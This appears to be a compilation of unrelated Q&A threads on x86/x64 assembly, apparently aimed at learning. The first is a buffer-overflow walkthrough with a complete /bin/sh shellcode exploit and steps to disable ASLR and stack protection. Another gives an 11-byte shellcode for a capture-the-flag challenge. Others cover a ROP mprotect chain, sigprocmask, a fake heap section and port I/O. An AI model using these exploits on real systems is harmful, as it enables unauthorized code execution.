I am trying to do some experiments with buffer overflows for fun. I was reading on this forum on the topic, and tried to write my own little code.
So what I did is a small "C" program, which takes character argument and runs until segmentation fault.
So I supply arguments until I get a message that I overwrote the return address with "A" which is 41. My buffer character length, in which I copy my input strings is [5].
Here is what I did in gdb.
run $(perl -e 'print "A"x32 ; ')
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400516 in main (argc=Cannot access memory at address 0x414141414141412d
Then I figured out that it takes 16 'A' to overwrite.
run $(perl -e 'print "A"x16 . "C"x8 . "B"x32 ; ')
0x0000000000400516 in main (argc=Cannot access memory at address 0x434343434343432f
)
Which tells us that the 8 "C" are overwriting the return address.
According to the online tutorials if I supply a valid adress instead of the 8 "C". I can jump to some place and execute code. So I overloaded the memory after the initial 16 "A".
The next step was to execute
run $(perl -e 'print "A"x16 . "C"x8 . "B"x200 ; ')
rax 0x0 0
rbx 0x3a0001bbc0 249108216768
rcx 0x3a00552780 249113683840
rdx 0x3a00553980 249113688448
rsi 0x42 66
rdi 0x2af9e57710e0 47252785008864
rbp 0x4343434343434343 0x4343434343434343
rsp 0x7fffb261a2e8 0x7fffb261a2e8
r8 0xffffffff 4294967295
r9 0x0 0
r10 0x22 34
r11 0xffffffff 4294967295
r12 0x0 0
r13 0x7fffb261a3c0 140736186131392
r14 0x0 0
r15 0x0 0
rip 0x400516 0x400516 <main+62>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]
After examining the memory 200 bytes after $rsp i found an address and I did the following:
run $(perl -e 'print "A"x16 . "\x38\xd0\xcb\x9b\xff\x7f" . "\x90"x50 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" ; ')
This however does not do anything. I would be grateful if someone can give me an idea what am I doing wrong.
First make sure that you change the randomize_va_space. On Ubuntu you would run the following as root
echo 0 > /proc/sys/kernel/randomize_va_space
Next make sure you are compiling the test program without stack smashing protection and set the memory execution bit. Compile it with the following gcc options to accomplish
-fno-stack-protector -z execstack
Also I found I needed more space to actually execute a shell so I would change your buffer to something more like buffer[64]
Next you can run the app in gdb and get the stack address you need to return to
First set a breakpoint right after the strcpy
(gdb) disassemble main
Dump of assembler code for function main:
0x000000000040057c <+0>: push %rbp
0x000000000040057d <+1>: mov %rsp,%rbp
0x0000000000400580 <+4>: sub $0x50,%rsp
0x0000000000400584 <+8>: mov %edi,-0x44(%rbp)
0x0000000000400587 <+11>: mov %rsi,-0x50(%rbp)
0x000000000040058b <+15>: mov -0x50(%rbp),%rax
0x000000000040058f <+19>: add $0x8,%rax
0x0000000000400593 <+23>: mov (%rax),%rdx
0x0000000000400596 <+26>: lea -0x40(%rbp),%rax
0x000000000040059a <+30>: mov %rdx,%rsi
0x000000000040059d <+33>: mov %rax,%rdi
0x00000000004005a0 <+36>: callq 0x400450 <strcpy#plt>
0x0000000000**4005a5** <+41>: lea -0x40(%rbp),%rax
0x00000000004005a9 <+45>: mov %rax,%rsi
0x00000000004005ac <+48>: mov $0x400674,%edi
0x00000000004005b1 <+53>: mov $0x0,%eax
0x00000000004005b6 <+58>: callq 0x400460 <printf#plt>
0x00000000004005bb <+63>: mov $0x0,%eax
0x00000000004005c0 <+68>: leaveq
0x00000000004005c1 <+69>: retq
End of assembler dump.
(gdb) b *0x4005a5
Breakpoint 1 at 0x4005a5
Then run the app and at the break point grab the rax register address.
(gdb) run `python -c 'print "A"*128';`
Starting program: APPPATH/APPNAME `python -c 'print "A"*128';`
Breakpoint 1, 0x00000000004005a5 in main ()
(gdb) info register
rax 0x7fffffffe030 140737488347136
rbx 0x0 0
rcx 0x4141414141414141 4702111234474983745
rdx 0x41 65
rsi 0x7fffffffe490 140737488348304
rdi 0x7fffffffe077 140737488347255
rbp 0x7fffffffe040 0x7fffffffe040
rsp 0x7fffffffdff0 0x7fffffffdff0
r8 0x7ffff7dd4e80 140737351863936
r9 0x7ffff7de9d60 140737351949664
r10 0x7fffffffdd90 140737488346512
r11 0x7ffff7b8fd60 140737349483872
r12 0x400490 4195472
r13 0x7fffffffe120 140737488347424
r14 0x0 0
r15 0x0 0
rip 0x4005a5 0x4005a5 <main+41>
eflags 0x206 [ PF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb)
Next determine your max buffer size. I know that the buffer of 64 crashes at 72 bytes so I will just go from that.. You could use something like metasploits pattern methods to give you this or just figure it out from trial and error running the app to find out the exact byte count it takes before getting a segfault or make up a pattern of your own and match the rip address like you would with the metasploit pattern option.
Next, there are many different ways to get the payload you need but since we are running a 64bit app, we will use a 64bit payload. I compiled C and then grabbed the ASM from gdb and then made some changes to remove the \x00 chars by changing the mov instructions to xor for the null values and then shl and shr to remove them from the shell command. We will show this later but for now the payload is as follows.
\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05
our payload here is 48 bytes so we have 72 - 48 = 24
We can pad the payload with \x90 (nop) so that instruction will not be interrupted. Ill add 2 at the end of the payload and 22 at the beginning. Also I will tack on the return address that we want to the end in reverse giving the following..
`python -c 'print "\x90"*22+"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05\x90\x90\x30\xe0\xff\xff\xff\x7f"';`
Now if you want to run it outside of gdb, you may have to fudge with the return address. In my case the address becomes \x70\xe0\xff\xff\xff\x7f outside of gdb. I just increased it until it worked by going to 40 then 50 then 60 then 70..
test app source
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char name[64];
strcpy(name, argv[1]);
printf("Arg[1] is :%s\n", name);
return 0;
}
This is the payload in C
#include <stdlib.h>
int main()
{
execve("/bin/sh", NULL, NULL);
}
And payload in ASM which will build and run
int main() {
__asm__(
"mov $0x0,%rdx\n\t" // arg 3 = NULL
"mov $0x0,%rsi\n\t" // arg 2 = NULL
"mov $0x0068732f6e69622f,%rdi\n\t"
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack pointer = start of /bin/sh
"mov $0x3b,%rax\n\t" // syscall number = 59
"syscall\n\t"
);
}
And since we can't use \x00 we can change to xor the values and do some fancy shifting to remove the bad values of the mov for setting up /bin/sh
int main() {
__asm__(
"xor %rdx,%rdx\n\t" // arg 3 = NULL
"mov %rdx,%rsi\n\t" // arg 2 = NULL
"mov $0x1168732f6e69622f,%rdi\n\t"
"shl $0x8,%rdi\n\t"
"shr $0x8,%rdi\n\t" // first byte = 0 (8 bits)
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack ptr = start of /bin/sh
"mov $0x111111111111113b,%rax\n\t" // syscall number = 59
"shl $0x38,%rax\n\t"
"shr $0x38,%rax\n\t" // first 7 bytes = 0 (56 bits)
"syscall\n\t"
);
}
if you compile that payload, run it under gdb you can get the byte values you need such as
(gdb) x/bx main+4
0x400478 <main+4>: 0x48
(gdb)
0x400479 <main+5>: 0x31
(gdb)
0x40047a <main+6>: 0xd2
(gdb)
or get it all by doing something like
(gdb) x/48bx main+4
0x4004f0 <main+4>: 0x48 0x31 0xd2 0x48 0x89 0xd6 0x48 0xbf
0x4004f8 <main+12>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x11
0x400500 <main+20>: 0x48 0xc1 0xe7 0x08 0x48 0xc1 0xef 0x08
0x400508 <main+28>: 0x57 0x48 0x89 0xe7 0x48 0xb8 0x3b 0x11
0x400510 <main+36>: 0x11 0x11 0x11 0x11 0x11 0x11 0x48 0xc1
0x400518 <main+44>: 0xe0 0x38 0x48 0xc1 0xe8 0x38 0x0f 0x05
Well for starters... Are you entirely sure that the address on the stack is the return pointer and not a pointer to say a data structure or string somewhere? If that is the case it will use that address instead of the string and could just end up doing nothing :)
So check if your function uses local variables as these are put on the stack after the return address. Hope this helps ^_^ And good luck!
i haven't worked with x64 much , but a quick look says you have 16 bytes till rip overwrite.
instead of the \x90 try \xCC's to see if controlled code redirection has occured, if it has gdb should hit(land in the \xCC pool) the \xCC and pause (\xCC are in a way 'hardcoded' breakpoints).
Related
I've tried to reduce the code to something more minimal to demonstrate the problem.
BITS 64
global _start:function
global BIG_BAD_BLOCK:data
section .rodata progbits alloc noexec nowrite align=4
hc_str_a: db "Example", 0x0
section .bss nobits alloc noexec write align=4
personZ: resb 20 ;
personX: resb 20 ;
section FAKE_HEAP nobits alloc noexec write align=1
NEXT_ADDR: resq 1 ; pointer to the next available byte within the block
BIG_BAD_BLOCK: resb 204800 ; 200 KB chunk of memory
; cpu instructions
section .text progbits alloc exec nowrite align=16
_start: ; start(argc, argv, envp) // the kernel calls _start() with the args provided by the execve() system call
mov rdi, rsp ; (int*) rdi = rsp // argc is the first thing on the stack
add rdi, 8 ; (char**) rdi = (unsigned long) rdi + 8 // argv begins 8 bytes after argc
mov ecx, dword [rsp] ; (unsigned int) ecx = *((int*) rsp) // argc : the kernel passes initial program arguments on the stack, rather than by registers
mov eax, ecx ; (unsigned int) eax = ecx
mov ebx, 8 ; (unsigned int) ebx = 8
mul ebx ; (unsigned int) eax = argc * 8 // how many bytes long is the argv array
add eax, 8 ; (unsigned int) eax += 8 // byte length of argv + 8 byte offset for argv's trailing null
add rax, rdi ; (char**) rax = (unsigned long) argv + eax
mov rsi, rax ; (char**) rsi = envp //
mov eax, ecx ; (unsigned int) eax = argc //
call init ; init(argc, argv, envp)
nop ; // ignore the do-nothing instruction
init:
push rax ; // save the register we are going to clobber (argc)
push rdi ; // save the register we are going to clobber (argv)
push rsi ; // save the register we are going to clobber (envp)
push rbp ; (stackframe*) (--rsp) = (stackframe*) rbp // save copy of old top-of-stack at the new top-of-stack 8 bytes down
mov rbp, rsp ; (stackframe*) rbp = rsp // (this provides us a fixed pointer to the old top-of-stack)
call init_heap ; init_heap() // let's ignore this for now
mov rax, qword [rbp - 24] ; (unsigned int) eax = argc
mov rdi, qword [rbp - 16] ; (char**) rdi = argv
mov rsi, qword [rbp - 8] ; (char**) rsi = envp
call main ; (unsigned int) eax = main(argc, argv, envp)
call exit ; exit(eax)
main:
nop
mov eax, 0 ; (unsigned int) eax = 0
ret ; return 0;
init_heap:
mov qword [NEXT_ADDR], BIG_BAD_BLOCK ; NEXT_ADDR will start by pointing to the first byte of BIG_BAD_BLOCK
malloc: ; malloc(byteCount)
push qword [NEXT_ADDR]
add qword [NEXT_ADDR], rax ; NEXT_ADDR += byteCount
pop rax ; rax = (void*) memoryChunk
ret
exit: ; exit(statusCode)
mov rdi, rax ; rdi = (int) statusCode
mov rax, 60 ; rax = (unsigned long int) 60 // system call #60 is SYS_exit
syscall ; SYS_exit(statusCode) // tell kernel to kill this process
; To assemble:
; nasm -felf64 -gdwarf -o HeapProblem.o ./HeapProblem.asm
; To link:
; ld -o HeapProblem.bin HeapProblem.o
I assemble and link using the commands above. This is just 1 single assembly file. No includes. No macros. No libraries. Not even libC. Its just that 1 file you see there, assembled using the Netwide Assembler, and linked using the ld core utility. With only that 1 object file being processed by the linker.
This implies:
a traditional malloc is not being loaded.
No system calls to brk are being made.
No system calls to mmap are being made.
There is nothing happening except what you see in that 1 assembly file. No other code should be interacting with this binary in any way, except for the linux system kernel itself which will load the binary into memory when a shell invokes execve() on the path to the bin file
After assembling and linking the file, we go to execute/debug it.
gdb HeapProblem.bin
b *_start
run one simple test
info proc mappings
process 5423
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x401000 0x1000 0x0 /var/www/html/ASM/HeapProblem.bin
0x600000 0x601000 0x1000 0x0 /var/www/html/ASM/HeapProblem.bin
0x601000 0x633000 0x32000 0x0 [heap]
0x7ffff7ffb000 0x7ffff7ffd000 0x2000 0x0 [vvar]
0x7ffff7ffd000 0x7ffff7fff000 0x2000 0x0 [vdso]
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
maintenance info sections
Exec file:
`/var/www/html/ASM/HeapProblem.bin', file type elf64-x86-64.
[0] 0x004000b0->0x00400124 at 0x000000b0: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
[1] 0x00400124->0x0040012c at 0x00000124: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
[2] 0x0060012c->0x00600158 at 0x0000012c: .bss ALLOC
[3] 0x00600158->0x00632160 at 0x0000012c: FAKE_HEAP ALLOC
[4] 0x00000000->0x00000030 at 0x0000012c: .debug_aranges READONLY HAS_CONTENTS
[5] 0x00000000->0x00000053 at 0x0000015c: .debug_info READONLY HAS_CONTENTS
[6] 0x00000000->0x0000001b at 0x000001af: .debug_abbrev READONLY HAS_CONTENTS
[7] 0x00000000->0x00000066 at 0x000001ca: .debug_line READONLY HAS_CONTENTS
print & BIG_BAD_BLOCK
$1 = (<data variable, no debug info> *) 0x600160
So. The first mapping is to the binary itself for the .text and .rodata sections. Cool. That makes sense.
The second mapping is also to the binary, seemingly for the .bss and FAKE_HEAP sections. Which is also more-or-less what we expected. Though it should be noted that the second mapping is larger than what is needed for .bss, but not large enough to completely fit both .bss and FAKE_HEAP. It can only contain .bss and part of FAKE_HEAP.
Then we've got the 3rd mapping, marked as [heap].
I expected 1 of 2 things to happen:
A) The kernel would fail to recognize my FAKE_HEAP section as a true heap, and would simply include the entire thing in the same segment as .bss
OR
B) The kernel would recognize my FAKE_HEAP as being an unusual/non-standard section with attributes that are consistent with a heap, and would thus mark the entire section as a heap. With the mapping start and end addresses exactly matching the memory address onto which FAKE_HEAP was loaded, and its natural end-boundary.
What actually happened:
The kernel seems to have recognized a heap that starts at an arbitrary point within my FAKE_HEAP. It does not align. My FAKE_HEAP starts at 0x600158, with BIG_BAD_BLOCK starting at 0x600160. The kernel says the heap starts at 0x601000. That is 3,752 bytes into my structure. Which does not make sense at all. There's no reason that the kernel should think the heap begins 3,752 bytes past the beginning of this structure.
So, finally, a restatement of the question(s):
Should the kernel be detecting the FAKE_HEAP section or BIG_BAD_BLOCK symbol as a heap at all?
If so, why does the start address not match up with either the section or symbol start address?
If not, why is a heap being detected at all?
How is this heap being detected?
I need to understand why this is happening. Because I cannot find a clear logical or programmatic reason for this behavior. I've been researching this problem for the past 12 hours straight and I cannot figure this out. I've been searching for issues in the assembly, the linker, and the kernel itself.
Background: I am a beginner trying to understand how to golf assembly, in particular to solve an online challenge.
EDIT: clarification: I want to print the value at the memory address of RDX. So “SUPER SECRET!”
Create some shellcode that can output the value of register RDX in <= 11 bytes. Null bytes are not allowed.
The program is compiled with the c standard library, so I have access to the puts / printf statement. It’s running on x86 amd64.
$rax : 0x0000000000010000 → 0x0000000ac343db31
$rdx : 0x0000555555559480 → "SUPER SECRET!"
gef➤ info address puts
Symbol "puts" is at 0x7ffff7e3c5a0 in a file compiled without debugging.
gef➤ info address printf
Symbol "printf" is at 0x7ffff7e19e10 in a file compiled without debugging.
Here is my attempt (intel syntax)
xor ebx, ebx ; zero the ebx register
inc ebx ; set the ebx register to 1 (STDOUT
xchg ecx, edx ; set the ECX register to RDX
mov edx, 0xff ; set the length to 255
mov eax, 0x4 ; set the syscall to print
int 0x80 ; interrupt
hexdump of my code
My attempt is 17 bytes and includes null bytes, which aren't allowed. What other ways can I lower the byte count? Is there a way to call puts / printf while still saving bytes?
FULL DETAILS:
I am not quite sure what is useful information and what isn't.
File details:
ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5810a6deb6546900ba259a5fef69e1415501b0e6, not stripped
Source code:
void main() {
char* flag = get_flag(); // I don't get access to the function details
char* shellcode = (char*) mmap((void*) 0x1337,12, 0, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
mprotect(shellcode, 12, PROT_READ | PROT_WRITE | PROT_EXEC);
fgets(shellcode, 12, stdin);
((void (*)(char*))shellcode)(flag);
}
Disassembly of main:
gef➤ disass main
Dump of assembler code for function main:
0x00005555555551de <+0>: push rbp
0x00005555555551df <+1>: mov rbp,rsp
=> 0x00005555555551e2 <+4>: sub rsp,0x10
0x00005555555551e6 <+8>: mov eax,0x0
0x00005555555551eb <+13>: call 0x555555555185 <get_flag>
0x00005555555551f0 <+18>: mov QWORD PTR [rbp-0x8],rax
0x00005555555551f4 <+22>: mov r9d,0x0
0x00005555555551fa <+28>: mov r8d,0xffffffff
0x0000555555555200 <+34>: mov ecx,0x22
0x0000555555555205 <+39>: mov edx,0x0
0x000055555555520a <+44>: mov esi,0xc
0x000055555555520f <+49>: mov edi,0x1337
0x0000555555555214 <+54>: call 0x555555555030 <mmap#plt>
0x0000555555555219 <+59>: mov QWORD PTR [rbp-0x10],rax
0x000055555555521d <+63>: mov rax,QWORD PTR [rbp-0x10]
0x0000555555555221 <+67>: mov edx,0x7
0x0000555555555226 <+72>: mov esi,0xc
0x000055555555522b <+77>: mov rdi,rax
0x000055555555522e <+80>: call 0x555555555060 <mprotect#plt>
0x0000555555555233 <+85>: mov rdx,QWORD PTR [rip+0x2e26] # 0x555555558060 <stdin##GLIBC_2.2.5>
0x000055555555523a <+92>: mov rax,QWORD PTR [rbp-0x10]
0x000055555555523e <+96>: mov esi,0xc
0x0000555555555243 <+101>: mov rdi,rax
0x0000555555555246 <+104>: call 0x555555555040 <fgets#plt>
0x000055555555524b <+109>: mov rax,QWORD PTR [rbp-0x10]
0x000055555555524f <+113>: mov rdx,QWORD PTR [rbp-0x8]
0x0000555555555253 <+117>: mov rdi,rdx
0x0000555555555256 <+120>: call rax
0x0000555555555258 <+122>: nop
0x0000555555555259 <+123>: leave
0x000055555555525a <+124>: ret
Register state right before shellcode is executed:
$rax : 0x0000000000010000 → "EXPLOIT\n"
$rbx : 0x0000555555555260 → <__libc_csu_init+0> push r15
$rcx : 0x000055555555a4e8 → 0x0000000000000000
$rdx : 0x0000555555559480 → "SUPER SECRET!"
$rsp : 0x00007fffffffd940 → 0x0000000000010000 → "EXPLOIT\n"
$rbp : 0x00007fffffffd950 → 0x0000000000000000
$rsi : 0x4f4c5058
$rdi : 0x00007ffff7fa34d0 → 0x0000000000000000
$rip : 0x0000555555555253 → <main+117> mov rdi, rdx
$r8 : 0x0000000000010000 → "EXPLOIT\n"
$r9 : 0x7c
$r10 : 0x000055555555448f → "mprotect"
$r11 : 0x246
$r12 : 0x00005555555550a0 → <_start+0> xor ebp, ebp
$r13 : 0x00007fffffffda40 → 0x0000000000000001
$r14 : 0x0
$r15 : 0x0
(This register state is a snapshot at the assembly line below)
●→ 0x555555555253 <main+117> mov rdi, rdx
0x555555555256 <main+120> call rax
Since I already spilled the beans and "spoiled" the answer to the online challenge in comments, I might as well write it up. 2 key tricks:
Create 0x7ffff7e3c5a0 (&puts) in a register with lea reg, [reg + disp32], using the known value of RDI which is within the +-2^31 range of a disp32. (Or use RBP as a starting point, but not RSP: that would need a SIB byte in the addressing mode).
This is a generalization of the code-golf trick of lea edi, [rax+1] trick to create small constants from other small constants (especially 0) in 3 bytes, with code that runs less slowly than push imm8 / pop reg.
The disp32 is large enough to not have any zero bytes; you have a couple registers to choose from in case one had been too close.
Copy a 64-bit register in 2 bytes with push reg / pop reg, instead of 3-byte mov rdi, rdx (REX + opcode + modrm). No savings if either push needs a REX prefix (for R8..R15), and actually costs bytes if both are "non-legacy" registers.
See other answers on Tips for golfing in x86/x64 machine code on codegolf.SE for more.
bits 64
lea rsi, [rdi - 0x166f30]
;; add rbp, imm32 ; alternative, but that would mess up a call-preserved register so we might crash on return.
push rdx
pop rdi ; copy RDX to first arg, x86-64 SysV calling convention
jmp rsi ; tailcall puts
This is exactly 11 bytes, and I don't see a way for it to be smaller. add r64, imm32 is also 7 bytes, same as LEA. (Or 6 bytes if the register is RAX, but even the xchg rax, rdi short form would cost 2 bytes to get it there, and the RAX value is still the fgets return value, which is the small mmap buffer address.)
The puts function pointer doesn't fit in 32 bits, so we need a REX prefix on any instruction that puts it into a register. Otherwise we could just mov reg, imm32 (5 bytes) with the absolute address, not deriving it from another register.
$ nasm -fbin -o exploit.bin -l /dev/stdout exploit.asm
1 bits 64
2 00000000 488DB7D090E9FF lea rsi, [rdi - 0x166f30]
3 ;; add rbp, imm32 ; we can avoid messing up any call-preserved registers
4 00000007 52 push rdx
5 00000008 5F pop rdi ; copy to first arg
6 00000009 FFE6 jmp rsi ; tailcall
$ ll exploit.bin
-rw-r--r-- 1 peter peter 11 Apr 24 04:09 exploit.bin
$ ./a.out < exploit.bin # would work if the addresses in my build matched yours
My build of your incomplete .c uses different addresses on my machine, but it does reach this code (at address 0x10000, mmap_min_addr which mmap picks after the amusing choice of 0x1337 as a hint address, which isn't even page aligned but doesn't result in EIVAL on current Linux.)
Since we only tailcall puts with correct stack alignment and don't modify any call-preserved registers, this should successfully return to main.
Note that 0 bytes (ASCII NUL, not NULL) would actually work in shellcode for this test program, if not for the requirement that forbids it.
The input is read using fgets (apparently to simulate a gets() overflow).
fgets actually can read a 0 aka '\0'; the only critical character is 0xa aka '\n' newline. See Is it possible to read null characters correctly using fgets or gets_s?
Often buffer overflows exploit a strcpy or something else that stops on a 0 byte, but fgets only stops on EOF or newline. (Or the buffer size, a feature gets is missing, hence its deprecation and removal from even the ISO C standard library! It's literally impossible to use safely unless you control the input data). So yes, it's totally normal to forbid zero bytes.
BTW, your int 0x80 attempt is not viable: What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? - you can't use the 32-bit ABI to pass 64-bit pointers to write, and the string you want to output is not in the low 32 bits of virtual address space.
Of course, with the 64-bit syscall ABI, you're fine if you can hardcode the length.
push rdx
pop rsi
shr eax, 16 ; fun 3-byte way to turn 0x10000` into `1`, __NR_write 64-bit, instead of just push 1 / pop
mov edi, eax ; STDOUT_FD = __NR_write
lea edx, [rax + 13 - 1] ; 3 bytes. RDX = 13 = string length
; or mov dl, 0xff ; 2 bytes leaving garbage in rest of RDX
syscall
But this is 12 bytes, as well as hard-coding the length of the string (which was supposed to be part of the secret?).
mov dl, 0xff could make sure the length was at least 255, and actually much more in this case, if you don't mind getting reams of garbage after the string you want, until write hits an unmapped page and returns early. That would save a byte, making this 11.
(Fun fact, Linux write does not return an error when it's successfully written some bytes; instead it returns how many it did write. If you try again with buf + write_len, you would get a -EFAULT return value for passing a bad pointer to write.)
I would like to block all signals in a function using sigprocmask in assembly.
The following code works in C:
#include <stdio.h>
#include <signal.h>
int main() {
sigset_t n={(unsigned long int) 0xffffffff};
sigprocmask (SIG_BLOCK, &n, 0);
for (int i=0; i<0x8ffff; i++) printf(".");
}
When the code executes and starts printing dots on the terminal, I cannot interrupt it with Ctrl+C. So far so good.
The value of SIG_BLOCK is 0, apparently; and the syscall number for sys_rt_sigprocmask is 14:
http://blog.rchapman.org/post/36801038863/linux-system-call-table-for-x86-64
So I write:
[BITS 64]
[section .text align=1]
global main
main:
mov r10, 32
mov rdx, 0
mov rsi, newmask
mov rdi, 0
mov rax, 14
syscall
dotPrintLoop:
mov rdi, dotstring
mov rax, 0
syscall
jmp dotPrintLoop
[section .data align=1]
dotstring: db ".",0
newmask: dd 0xffffffff
dd 0xffffffff
dd 0xffffffff
...
And it does not work. gdb reveals that rax has the value -22 (EINVAL - "invalid parameter") after the first syscall; whereas the second syscall (of sys_write) works just fine.
What am I doing wrong?
Apparently r10 should hold the value 8 instead of 32.
I encountered 4 different definitions of sigset_t within the kernel code; and for each of them the sizeof() function returns a different result (32, 128, 4 and 8 as I recall). Only the final one is relevant to the syscall.
The kernel first checks that $r10 == sizeof(sigset_t); and returns EINVAL (-22) if that does not hold. The value of sizeof(sigset_t) is equal to 8 for both 32-bit and 64-bit versions.
I'm writing some ROP exploit code that calls mprotect via a syscall, after invoking int 0x80 eax is set to 0x0 indicating a success. Shifting execution to the target address still results in a SIGSEGV. I would love for someone to show me where I go wrong.
Some details, target address is the .data section, this is where I'll be writing by shellcode to:
[20] 0x8146820->0x814c2b8 at 0x000fd820: .data ALLOC LOAD DATA HAS_CONTENTS
I set eax to 125, ebx to the page boundary 0x8146000, ecx to 0x1000 (4096 page size) and edx to 0x7 (RWX).
Just before the syscall the registers look like this:
eax 0x7d 125
ecx 0x1000 4096
edx 0x7 7
ebx 0x8146000 135553024
esp 0xbffff2b0 0xbffff2b0
ebp 0x8d0e0f0 0x8d0e0f0
esi 0x804fb85 134544261
edi 0x43434343 1128481603
eip 0x80c0182 0x80c0182 <mprotect+18>
eflags 0x202 [ IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) disas $eip, $eip+20
Dump of assembler code from 0x80c0182 to 0x80c0196:
=> 0x080c0182 <mprotect+18>: int $0x80
0x080c0184 <mprotect+20>: pop %ebx
0x080c0185 <mprotect+21>: cmp $0xfffff001,%eax
0x080c018a <mprotect+26>: jae 0x80c7d80 <__syscall_error>
0x080c0190 <mprotect+32>: ret
and after the syscall the registers are:
(gdb) si
0x080c0184 in mprotect ()
(gdb) i r
eax 0x0 0
ecx 0x1000 4096
edx 0x7 7
ebx 0x8146000 135553024
esp 0xbffff2b0 0xbffff2b0
ebp 0x8d0e0f0 0x8d0e0f0
esi 0x804fb85 134544261
edi 0x43434343 1128481603
eip 0x80c0184 0x80c0184 <mprotect+20>
eflags 0x202 [ IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
However the memory location does not show a change in permissions and attempting to execute instructions there terminates the application:
(gdb) x/4x 0x8146820
0x8146820: 0x00000000 0x00000000 0x08146154 0x0000ea60
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x08146820 in data_start ()
Any suggestions on how/what to debug or what I'm doing wrong are welcome.
Edit
I ran it under strace without the debugger attached, seems like the mprotect call is a success, yet execution fails:
stat64("/etc/localtime", {st_mode=S_IFREG|0644, st_size=2197, ...}) = 0
mprotect(0x8146000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0} ---
+++ killed by SIGSEGV (core dumped) +++
Confirming crash address from core:
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x08146820 in data_start ()
Your mprotect call worked. The program crashes because 0x8146820 holds
0x0000, which disassembles to add [eax], al, and eax holds zero. But address 0 is not mapped. (That's why the segfault is at si_addr=0)
I'm trying to write byte 0xff to the parallel port at 0x378. It compiles and links without issue, but segfaults at the OUTSB instruction.
section .text
global _start
_err_exit:
mov eax, 1
mov ebx, 1
int 80h
_start:
mov eax, 101 ; ioperm
mov ebx, 0x378 ; Parallel port addr
mov ecx, 2 ; number of bytes to 'unlock'
mov edx, 1 ; enable
int 80h
mov esi, 0xff
mov dx, 0x378
outsb
mov eax, 1 ; exit
mov ebx, 0
int 80h
If I step through it with GDB and check the registers just before the OUTSB instruction, it doesn't look like there is anything in the DX register? or dx == edx in 32bit?
(gdb) info registers
eax 0x0 0
ecx 0x2 2
edx 0x378 888
ebx 0x378 888
esp 0xffffd810 0xffffd810
ebp 0x0 0x0
esi 0xff 255
edi 0x0 0
eip 0x8048090 0x8048090 <_start+36>
eflags 0x246 [ PF ZF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
What am I doing wrong here?
(info on the OUTS instructions: http://siyobik.info/main/reference/instruction/OUTS%2FOUTSB%2FOUTSW%2FOUTSD)
EDIT:
The C version of the program works:
int main(int argc, char *argv[])
{
int addr = 0x378;
int result = ioperm(addr,5,1);
outb(0xff, addr);
}
There is a number of issues with that code. Firstly, you seem to forget that OUTSB is a privileged instruction, i.e. it can be executed only if the calling process has ring 0 access, i.e. it's a part of the kernel code. As far as I'm aware, the only code in Linux that has access to privileged instructions is the kernel itself, and the modules that it loads. All the other processes will give you a Segmentation fault (which is actually a General Protection Fault signalled by the CPU) when you try to execute a privileged instruction from a nonprivileged segment of code. I don't know how calling the ioperm syscall influences that, though.
Secondly, OUTSB writes a byte from a memory location specified by ESI to the I/O port in DX. In this case, you're telling the processor to write data to the port from location 0xff, to which the process surely doesn't have access. You can simplify that by simply changing the code to use the OUT instruction, since OUTSB is rather meant to be used with the REP prefix. Try this :
mov al, 0xff
out 0x378, al
This outputs the byte in al to the I/O port specified by the immediate operand, in this case 0x378.
Let me know how that turned out.